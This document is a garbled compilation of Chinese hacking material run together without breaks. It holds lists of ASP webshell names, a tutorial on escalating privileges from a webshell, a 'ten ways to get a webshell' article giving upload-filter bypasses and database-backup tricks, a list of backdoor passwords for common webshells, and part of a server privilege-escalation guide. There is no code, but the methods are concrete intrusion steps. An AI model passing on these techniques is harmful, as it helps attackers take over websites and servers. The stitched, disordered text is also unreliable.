WebShell黑羽基地免杀asp大马Hacked By CHINA!Asp站长助手6.0web综合安全评测 - Beta3未知数Xbaidu｝"路遥知马力黑客网站之家 美化版Thé、End.゛笑佛天下西域小刚-站长助手-修改版本XXXXX暗组超强功能修正去后门加强S-U提权版黑客官方-长期提供网站入侵 密码破解 数据库入侵ASPAdmin_A火狐ASP木马(超强版)"雨夜孤魂Dark Security Team随风自由的泪伟大的农民mr.con asp小马JspX围剿专版maek dreamShell靈魂◆安全小组+"银河安全网ASPXSpyDarkNo Backdoor Webshell(刀)黑勇士shell勇士版小武来了Evil sadnessF.S.T 联盟交流群内部版!!!别外传噢独自等待专用windows[D.s.T]会员专用WebShell我要进去'Rose随风自由的泪F.S.T 海盗内部版.!别外传噢。

by 海盗6.0 VIP(密码防破解版JFengEvil sadness路遥知马力奥运专版网站维护工具(加强版)"黑客官方未知数X心动吧ASP超级提权修正加强版200801242010贺岁版 免杀 WebShellMichael、T 专用asp提权木马Evil sadness邪恶的装逼大叔冰菊【HACKYONG】最终版芝麻开门aiezu萧萧文件管理Password:冷血奥运专版网站维护工具(加强版by：空气暗组超强功能修正去后门加强S-U提权版火狐ASP木马(超强版)" 华夏五周年庆典版（中国数据）asp 黑客→kissyEvil sadnessF.S.T 联盟交流群内部版.!别外传噢username这是一个没有信仰的年代伟沙漠之烟去演绎神话吧'Sam,asp大马修正加强版 QQ:42466841fuck you小武来了Baiki-"LoginE.V.A.V 专 用 网 马『修改版』月满西楼蛋蛋WEBSHELL鼠年增强版乄缘來④妳专版免杀asp大马F.S.T 联盟交流群内部版.!别外传噢暗组超强功能修正去后门加强S-U提权版80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一asp G.xp 专用SatanF.S.T 联盟交流群内部版!!!别外传噢!!!Evil sadness懂你味道黑鹰专用WEBSHELL思易免杀ASP木马3.0（最新两款）ＴＸ－网络专用ASP木马F.S.T 联盟交流群内部版.!别外传噢。

本地溢出提权0x00 前言0x01 找可写目录0x02 运行exploit提权0x03 附录0x00 前言溢出漏洞就像杯子里装水,水多了杯子装不进去,就会把里面的水溢出来.而相对计算机来说计算机有个地方叫缓存区,程序的缓存区长度是被事先设定好的,如果用户输入的数据超过了这个缓存区的长度,那么这个程序就会溢出了.缓存区溢出漏洞主要是由于许多软件没有对缓存区检查而造成的.这一章大概就是说利用一些现成的造成溢出漏洞的exploit通过运行,把用户从users组或其它系统用户中提升到administrators组.首先asp webshell要支持wscript(wscript.shell/shell.application)一般翻开webshell里面都会有组件支持,看到wscript.shell 旁边的勾选上了就支持wscript,当然也有一些webshell会有诈胡的现象.- -市面上的几款比拟火的webshell貌似都有这些问题,帮朋友提权他的webshell有wscript.shell 支持,然后找个目录执行cmd的结果不行,转到我那webshell上显示没wscript.shell 支持..或者aspx能调用.net组件来执行cmd的命令.这里主要用几款市面上比拟多人利用的windows exploit提权的利用工具.0x01 找可写目录这里附上啊D写的asp版本扫描可写目录和欧欧写的aspx扫可写目录,最后附上一款我自己比拟喜欢用来日星外时候的辅助小手冰凉的aspx 通过查注册表然后获取路径,配合啊D 的扫可写目录比拟不错.这些工具我们都演示一遍吧.输入目录,然后点击开始检测,得出以下结果蓝色是貌似是代表有一定的权限,未必可写(可能可读),红色是代表文件夹可写,红色的文件呢就是代表那个文件可写了,黑色是代表不存在该文件夹.接下来演示一下欧欧写的aspx扫描,比拟简单,一看就清楚了..输入文件夹路径或者盘符0.0,接着点击ScanWrtieable即可.最后是演示一下小手冰凉写的这款通过读取注册表里的软件的路径,然后输出注册表里的数据,显示软件安装所在的路径..配合啊D的目录读写检测asp版,可以快速的找到可写目录。

获取webshell的⼗种⽅法⿊客在⼊侵企业⽹站时，通常要通过各种⽅式获取webshell从⽽获得企业⽹站的控制权，然后⽅便进⾏之后的⼊侵⾏为。

本篇⽂章将如何获取webshell总结成为了⼗种⽅法，希望⼴⼤的企业⽹络管理员能够通过了解获取的途径，对企业⾃⾝进⾏防范。

⼀、通过上传⽂件类型过滤漏洞获取webshell由于未采⽤⽩名单过滤⽂件类型，导致asa,cer,等⽂件类型，未进⾏限制，asa,cer类型⽂件的映射处理默认跟asp映射处理⼀样，将webshell伪装成该种类型的⽂件上传即可⼆、结合Burp Suite⼯具，修改上传⽂件信息，逃避验证现在很多的脚本程序上传模块不是只允许上传合法⽂件类型，⽽⼤多数的系统是允许添加上传类型 php.g1f的上传类型，这是php的⼀个特性，最后的哪个只要不是已知的⽂件类型即可，php会将php.g1f作为。

php来正常运⾏，从⽽也可成功拿到shell.LeadBbs3.14后台获得webshell⽅法是：在上传类型中增加asp ，注意，asp后⾯是有个空格的，然后在前台上传ASP马，当然也要在后⾯加个空格！三、利⽤后台管理功能写⼊webshell上传漏洞基本上补的也差不多了，所以我们进⼊后台后还可以通过修改相关⽂件来写⼊webshell.⽐较的典型的有dvbbs6.0，还有leadbbs2.88等，直接在后台修改配置⽂件，写⼊后缀是asp的⽂件。

⽽LeadBbs3.14后台获得webshell另⼀⽅法是：添加⼀个新的友情链接，在⽹站名称处写上冰狐最⼩马即可，最⼩马前后要随便输⼊⼀些字符，http：\\⽹站\inc\IncHtm\BoardLink.asp就是我们想要的shell.四、利⽤xpcmd..命令⽣成webshell五、利⽤后台数据库备份及恢复获取webshell主要是利⽤后台对access数据库的“备份数据库”或“恢复数据库”功能，“备份的数据库路径”等变量没有过滤导致可以把任意⽂件后缀改为asp，从⽽得到webshell，msssql版的程序就直接应⽤了access版的代码，导致sql版照样可以利⽤。

最强⿊吃⿊：WEBSHELL⼤马隐藏万能密码⼤全因为很多原因，很多新⼿都不会编写⾃⼰的⼤马，⼤多数新⼿都会通过百度去下载对应脚本的⼤马，然⽽这些webshell⼤马都是早期流传出来的，基本上都存在后门，可以通过万能密码登录，即使你修改i过密码了，怎么样是不是很可怕？下⾯⼩编就将这些万能密码分享给⼤家吧！⿊⽻基地免杀asp⼤马密码5201314Hacked By CHINA! 密码chinaAsp站长助⼿6.0 密码584521web综合安全评测 – Beta3 密码nohack未知数X 密码45189946baidu｝” 密码baidu路遥知马⼒密码123⿊客⽹站之家美化版密码chenxueThé、End.゛密码and QQ：2780217151笑佛天下密码cnot西域⼩刚-站长助⼿-修改版本密码xxoxxXXXXX 密码rinima暗组超强功能修正去后门加强S-U提权版密码hkk007⿊客官⽅-长期提供⽹站⼊侵,密码破解数据库⼊侵密码chengnuoASPAdmin_A 密码”5556661221″ ‘123456⽕狐ASP⽊马(超强版)” 密码wrsk⾬夜孤魂密码54321Dark Security Team 密码yuemo 或者xingainian随风⾃由的泪密码jcksyes伟⼤的农民密码521mr.con asp⼩马密码*******JspX 密码4lert围剿专版密码yuemo或者5201314maek dream 密码hackerShell 密码xxxxx靈魂◆安全⼩组+” 密码10011C120105101银河安全⽹密码fclsharkASPXSpy 密码19880118Dark 密码376186027No Backdoor Webshell(⼑) 密码admin⿊勇⼠shell勇⼠版密码654321⼩武来了密码535039Evil sadness 密码adminF.S.T 联盟交流群内部版别外传噢密码000独⾃等待专⽤密码123windows 密码 123[D.s.T]会员专⽤WebShell 密码darkst我要进去’ 密码jcksyesHacker‘Rose 密码123456随风⾃由的泪密码jcksyesF.S.T 海盗内部版.!别外传噢。

对服务器进行提权的方法本页仅作为文档封面，使用时可以删除This document is for reference only-rar21year.March对服务器进行提权的方法文章录入：责任编辑： 84【字体：小大】现在可以说网络管理员对服务器的设置是越来越BT，但BT的同时，也有黑客朋友们对服务器的不断的测试，在测试中往往获取最低的guest权限是简单的，像我们在入侵网站过程中，获取webshell是简单的，但是当由webshell的guest权限向system权限提升时却往往是止步不前。

所以我有想写这样一篇文章的想法，但是在思考的过程中，又不得不承认，方法是不断的探索中出来的，方法更是有常规的也有另辟蹊径的。

下面就做一些简单的介绍，对提权的方法进行一些介绍，同时也希望在更多朋友的不断回复中能够丰富我们的方法。

首先要说明的是，过早的一些漏洞我们就不再多说了，只说一些现在可以见到的吧。

还有就是本文的题目是webshell下的服务器提权方法。

下面我们就进入主题，对webshell的提权方法！首先我们要明确的是，提权一般是依靠主机所开通的服务，利用服务存在的漏洞和管理员设置的疏忽进行提权的，不过也不排除一些SB的管理员对服务器设置的似乎没有"穿衣服".下面就是针对一些常见的服务进行的提权方法。

在获取webshell后，我们常见的是看一下系统的服务，查看服务可以通过利用扫描器对服务器ip进行扫描，或是在webshell中有执行dos命令时查看net start来查看主机所开放的服务。

首先我们说一下从简单的开始说起：的提权方法pcanywhere软件我想大家都了解，为什么将它放在首位就是因为读取密码后直接连接就可以了，如果对方主机在开通了pcanywhere的服务端的话，我们看能否跳转到这个目录C:\Documents and Settings\All Users\ApplicationData\Symantec\pcAnywhere\，如果行那就最好了，直接下载它的CIF文件，然后使用pcanywhere的密码读取器得到pcAnywhere密码，然后使用pcanywhere 登陆即可!接下来就是可视化操作了。